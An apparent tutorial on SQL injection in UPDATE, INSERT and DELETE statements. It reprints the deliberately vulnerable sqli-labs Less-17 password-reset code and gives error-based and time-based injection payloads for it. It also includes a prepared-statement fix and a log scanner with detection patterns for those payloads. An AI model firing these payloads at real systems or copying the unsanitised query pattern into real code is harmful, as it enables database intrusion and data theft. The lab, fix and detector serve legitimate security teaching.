MySQL data handling comes down to four operations: insert, delete, update and select. In SQL injection, the form one usually meets is the SELECT query. What about INSERT, DELETE and UPDATE?
Set up Docker and the open-source vulstudy project (which bundles the sqli-labs environment) on Ubuntu.
sudo apt-get update -y
sudo apt-get install docker.io -y
sudo apt-get install docker-compose -y
sudo apt-get install git -y
sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart
git clone https://github.com/c0ny1/vulstudy.git
cd vulstudy/sqli-labs
sudo docker-compose up -d
1. INSERT
insert into table_name(column_name1,column_name2)values('value1','value2');
insert into table_name values('value1','value2');
insert into table_name set column_name1='value1',column_name2='value2';
2. DELETE
delete from table_name where column_name='value';
3. UPDATE
update table_name set column_name1='value2' where column_name2='value2';
sqli-labs Less-17 code
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

function check_input($value)
{
    if(!empty($value))
    {
        // truncation (see comments)
        $value = substr($value,0,15);
    }
    // Stripslashes if magic quotes enabled
    if (get_magic_quotes_gpc())
    {
        $value = stripslashes($value);
    }
    // Quote if not a number
    if (!ctype_digit($value))
    {
        $value = "'" . mysql_real_escape_string($value) . "'";
    }
    else
    {
        $value = intval($value);
    }
    return $value;
}

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']);
    $passwd=$_POST['passwd'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);
    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";
        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }
        echo '<img src="../images/flag1.jpg" />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg" />';
        echo "</font>";
    }
}
?>
1. Code review: the input is filtered by the check_input function, the database is then queried with the username as the condition, and when a matching record exists that user's password is updated. This is a password-reset feature. However, during input filtering only the username is sanitised; the password is never cleaned, and that is what introduces the SQL injection. Note also that the code appends both the username and the new password in plaintext to result.txt, and that mysql_error() is printed straight back to the user, which is what makes error-based injection readable.
2. What check_input does: it keeps only the first 15 characters of the input; it checks whether the server has magic_quotes_gpc enabled and, if so, removes the backslashes that setting added; it checks whether the string consists entirely of digit characters and, if not, escapes the special characters with backslashes and wraps the value in single quotes; if it is all digits, it converts the value to an integer.
3. Functions used:
get_magic_quotes_gpc(): reports whether magic_quotes_gpc is enabled; it always returns false from PHP 5.4 onward and was removed in PHP 8.
stripslashes(): removes the backslashes added by addslashes().
ctype_digit(): returns true only when every character of the string is a decimal digit (false for an empty string).
mysql_real_escape_string(): escapes the characters MySQL treats specially (quotes, backslash, NUL, newlines) according to the connection's character set; removed in PHP 7.
intval(): converts the value to an integer.
addslashes(): prefixes single quotes, double quotes, backslashes and NUL with a backslash; this is the quoting magic_quotes_gpc applied to request data.
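The fix the review points to, as an added example written for this page and not code from sqli-labs: the same reset flow using mysqli prepared statements, so that neither uname nor passwd is ever spliced into the SQL text. The connection parameters are placeholders to replace with your own, and the `users` table with `username` and `password` columns is assumed as in Less-17.

```php
<?php
// Added example, not sqli-labs code: Less-17's reset flow with mysqli prepared
// statements. Both inputs are bound as parameters, so check_input-style quoting
// is unnecessary and a value such as "') and sleep(5)#" is stored as a plain string.
function reset_password(mysqli $db, string $uname, string $passwd): bool
{
    // 1. Look the user up. LIMIT 1 mirrors the original "LIMIT 0,1".
    $stmt = $db->prepare("SELECT username FROM users WHERE username = ? LIMIT 1");
    if ($stmt === false) {
        throw new RuntimeException("prepare failed: " . $db->error);
    }
    $stmt->bind_param("s", $uname);
    $stmt->execute();
    $stmt->bind_result($row1);
    $found = $stmt->fetch();          // true when a row was read, null when none
    $stmt->close();
    if (!$found) {
        return false;                 // unknown user: nothing to update
    }

    // 2. Update the password. The lab stores the plaintext and also appends it
    //    to result.txt; hash it instead and do not log it at all.
    $hash = password_hash($passwd, PASSWORD_DEFAULT);
    $stmt = $db->prepare("UPDATE users SET password = ? WHERE username = ?");
    if ($stmt === false) {
        throw new RuntimeException("prepare failed: " . $db->error);
    }
    $stmt->bind_param("ss", $hash, $row1);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

if (isset($_POST['uname'], $_POST['passwd'])) {
    // Placeholder credentials: replace with the values from sql-connect.php.
    $db = new mysqli("DB_HOST", "DB_USER", "DB_PASS", "DB_NAME");
    if ($db->connect_error) {
        http_response_code(500);
        exit("database unavailable");
    }
    $db->set_charset("utf8mb4");      // binding and escaping depend on the charset

    // Report only the outcome. Echoing mysql_error() to the user, as the lab
    // does, is what turned a failed UPDATE into a readable error-based channel.
    echo reset_password($db, $_POST['uname'], $_POST['passwd'])
        ? "Password updated"
        : "No such user";
}
```

The 15-character truncation and the ctype_digit branch of check_input disappear entirely: with placeholders the driver sends values separately from the statement, so no quoting decision has to be made per input, and an all-digit username is still treated as a string.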
Error-based and time-based injection at the injection point: there is no data echo, so UNION injection is ruled out; there is no boolean echo, so boolean blind injection is ruled out.
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
1. Error-based injection
uname=admin&passwd=') and updatexml(1,(concat(0x7e,(select database()),0x7e)),1)#&submit=Submit
2. Time-based blind injection
uname=admin&passwd=') and if((ord(left((select database()),1))=ascii('s')),sleep(1),0)#&submit=Submit
Adjust the payload as needed.
The above is injection under UPDATE. Because UPDATE, INSERT and DELETE are used in contexts where the result is generally not echoed, boolean injection and time-based injection are the usual choices.
1. Injection under INSERT:
Boolean injection:
insert into Rj45(id,word)values(3,updatexml(1,(concat(0x7e,(select database()),0x7e)),1));
Time-based injection:
insert into Rj45(id,word)values(5,if((ord(left((select database()),1))=ascii('C')),sleep(5),0));
Note: once a time-based injection succeeds, the id being inserted has to be changed, otherwise the next attempt hits a primary-key uniqueness conflict.
2. Injection under DELETE:
Boolean injection:
delete from Rj45 where id=0 and updatexml(1,(concat(0x7e,(select database()),0x7e)),1);
Time-based injection:
delete from Rj45 where id=3 and if((ord(left((select database()),1))=ascii('C')),sleep(5),0);
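From the defensive side, the logging the Less-17 code already does gives something to monitor: every reset attempt lands in result.txt as a "User Name:" line followed by a "New Password:" line. As an added example that is not part of the original post, here is a scanner for that file which flags attempts whose password field carries the indicator families seen in the payloads above (updatexml/extractvalue, sleep/benchmark, a nested SELECT, comment terminators, a quote followed by AND/OR). The sample log and the indicator names are constructed for the example.

```php
<?php
// Added example, not from sqli-labs: scan the result.txt that Less-17 appends to
// ("User Name:..." then "New Password:..." per attempt) and flag attempts whose
// password field looks like SQL rather than a password.
function classify_password(string $value): array
{
    // Indicator families, matched case-insensitively. The labels are our own.
    $indicators = [
        'error_based' => '/\b(updatexml|extractvalue)\s*\(/i',
        'time_based'  => '/\b(sleep|benchmark)\s*\(/i',
        'subquery'    => '/\(\s*select\b/i',
        'terminator'  => '/(#|--\s|\/\*)/',
        'quote_break' => '/[\'"]\s*\)?\s*(and|or)\b/i',
    ];
    $hits = [];
    foreach ($indicators as $name => $regex) {
        if (preg_match($regex, $value) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

function scan_result_log(string $text): array
{
    $findings = [];
    $user = null;
    foreach (preg_split('/\r?\n/', $text) as $index => $line) {
        if (strpos($line, 'User Name:') === 0) {
            // check_input has already wrapped the name in quotes, e.g. 'admin'
            $user = substr($line, strlen('User Name:'));
            continue;
        }
        if (strpos($line, 'New Password:') === 0) {
            $hits = classify_password(substr($line, strlen('New Password:')));
            if ($hits !== []) {
                $findings[] = ['line' => $index + 1, 'user' => $user, 'indicators' => $hits];
            }
        }
    }
    return $findings;
}

// Constructed sample in the format the lab's two fwrite() calls produce:
// one ordinary reset, then the two payloads from the write-up above.
$sample = "User Name:'admin'\nNew Password:hunter2\n"
        . "User Name:'admin'\nNew Password:') and updatexml(1,(concat(0x7e,(select database()),0x7e)),1)#\n"
        . "User Name:'admin'\nNew Password:') and if((ord(left((select database()),1))=ascii('s')),sleep(1),0)#\n";

foreach (scan_result_log($sample) as $f) {
    printf("line %d user %s: %s\n", $f['line'], $f['user'], implode(', ', $f['indicators']));
}
```

Run it as `php scan.php` after pointing `$sample` at `file_get_contents('result.txt')`. The plain reset produces no finding; the two payload attempts are reported with the indicator families they match, which is enough to alert on a lab host or, with the same regexes, to feed a WAF or SIEM rule. Keep in mind that the log is itself a liability: the patched version above stops writing passwords to disk, so in production this detection belongs on the web server's request log instead.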
References: 1. MySQL 注入天书 (mysql注入天书) 2. PHP manual https://www.php.net/manual/zh/